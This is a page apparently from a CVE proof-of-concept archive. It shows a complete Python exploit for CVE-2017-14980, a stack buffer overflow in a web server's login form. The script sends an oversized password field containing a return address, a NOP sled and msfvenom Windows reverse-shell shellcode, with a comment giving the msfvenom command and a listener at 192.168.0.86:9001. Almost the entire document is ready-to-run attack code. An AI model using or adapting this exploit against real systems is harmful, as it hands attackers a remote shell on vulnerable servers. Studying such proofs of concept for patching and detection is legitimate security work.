4837 Total CVEs
26 Years
GitHub
Home / 2017 / CVE-2017-14980
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
import socket

ip = "192.168.0.87"
port = 80

def generate_overflow(payload):
  overflow = f"username=admin&password={payload}"

  buf = "POST /login HTTP/1.1\r\n"
  buf += "Host: 127.0.0.1\r\n"
  buf += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\r\n"
  buf += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
  buf += "Accept-Language: en-US,en;q=0.5\r\n"
  buf += "Content-Type: application/x-www-form-urlencoded\r\n"
  buf += "Origin: http://127.0.0.1\r\n"
  buf += "Connection: close\r\n"
  buf += "Referer: http://127.0.0.1/login\r\n"
  buf += "Upgrade-Insecure-Requests: 1\r\n"
  buf += f"Content-Length: {len(overflow)}\r\n"
  buf += "\r\n"
  buf += overflow
  return buf

# Add bad chars here after first iteration of finding bad chars
# Then re-generate bytearray with the bad chars removed using mona
remove_badchars_from_badchars = "\x00\x0a\x0d\x25\x26\x2b\x3d"
badchars = "".join([chr(int(hex(x),16)) for x in range(1,256)])
for char in remove_badchars_from_badchars:
  badchars = badchars.replace(char, "")

offset = 520
overflow = "A" * offset
retn = "\x83\x0c\x09\x10" # 0x10090c83 \x83\x0c\x09\x10
padding = "\x90" * 10 # Has to be at least 4

# Badchars: \x00\x0a\x0d\x25\x26\x2b\x3d
# Payload: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.86 LPORT=9001 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f c
payload = (
"\xda\xc7\xb8\x0c\xdd\x28\xcc\xd9\x74\x24\xf4\x5a\x31\xc9"
"\xb1\x52\x31\x42\x17\x83\xc2\x04\x03\x4e\xce\xca\x39\xb2"
"\x18\x88\xc2\x4a\xd9\xed\x4b\xaf\xe8\x2d\x2f\xa4\x5b\x9e"
"\x3b\xe8\x57\x55\x69\x18\xe3\x1b\xa6\x2f\x44\x91\x90\x1e"
"\x55\x8a\xe1\x01\xd5\xd1\x35\xe1\xe4\x19\x48\xe0\x21\x47"
"\xa1\xb0\xfa\x03\x14\x24\x8e\x5e\xa5\xcf\xdc\x4f\xad\x2c"
"\x94\x6e\x9c\xe3\xae\x28\x3e\x02\x62\x41\x77\x1c\x67\x6c"
"\xc1\x97\x53\x1a\xd0\x71\xaa\xe3\x7f\xbc\x02\x16\x81\xf9"
"\xa5\xc9\xf4\xf3\xd5\x74\x0f\xc0\xa4\xa2\x9a\xd2\x0f\x20"
"\x3c\x3e\xb1\xe5\xdb\xb5\xbd\x42\xaf\x91\xa1\x55\x7c\xaa"
"\xde\xde\x83\x7c\x57\xa4\xa7\x58\x33\x7e\xc9\xf9\x99\xd1"
"\xf6\x19\x42\x8d\x52\x52\x6f\xda\xee\x39\xf8\x2f\xc3\xc1"
"\xf8\x27\x54\xb2\xca\xe8\xce\x5c\x67\x60\xc9\x9b\x88\x5b"
"\xad\x33\x77\x64\xce\x1a\xbc\x30\x9e\x34\x15\x39\x75\xc4"
"\x9a\xec\xda\x94\x34\x5f\x9b\x44\xf5\x0f\x73\x8e\xfa\x70"
"\x63\xb1\xd0\x18\x0e\x48\xb3\xe6\x67\x52\x15\x8f\x75\x52"
"\xba\x66\xf3\xb4\xd6\x68\x55\x6f\x4f\x10\xfc\xfb\xee\xdd"
"\x2a\x86\x31\x55\xd9\x77\xff\x9e\x94\x6b\x68\x6f\xe3\xd1"
"\x3f\x70\xd9\x7d\xa3\xe3\x86\x7d\xaa\x1f\x11\x2a\xfb\xee"
"\x68\xbe\x11\x48\xc3\xdc\xeb\x0c\x2c\x64\x30\xed\xb3\x65"
"\xb5\x49\x90\x75\x03\x51\x9c\x21\xdb\x04\x4a\x9f\x9d\xfe"
"\x3c\x49\x74\xac\x96\x1d\x01\x9e\x28\x5b\x0e\xcb\xde\x83"
"\xbf\xa2\xa6\xbc\x70\x23\x2f\xc5\x6c\xd3\xd0\x1c\x35\xf3"
"\x32\xb4\x40\x9c\xea\x5d\xe9\xc1\x0c\x88\x2e\xfc\x8e\x38"
"\xcf\xfb\x8f\x49\xca\x40\x08\xa2\xa6\xd9\xfd\xc4\x15\xd9"
"\xd7"
)
postfix = ""

buffer = overflow + retn + padding + payload + postfix

# View the payload before sending
# print(bytes(generate_overflow(buffer), "latin-1"))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(generate_overflow(buffer), "latin-1"))
  s.close()
  print("Done!")
except Exception as e:
  print(f"Could not connect. {e}")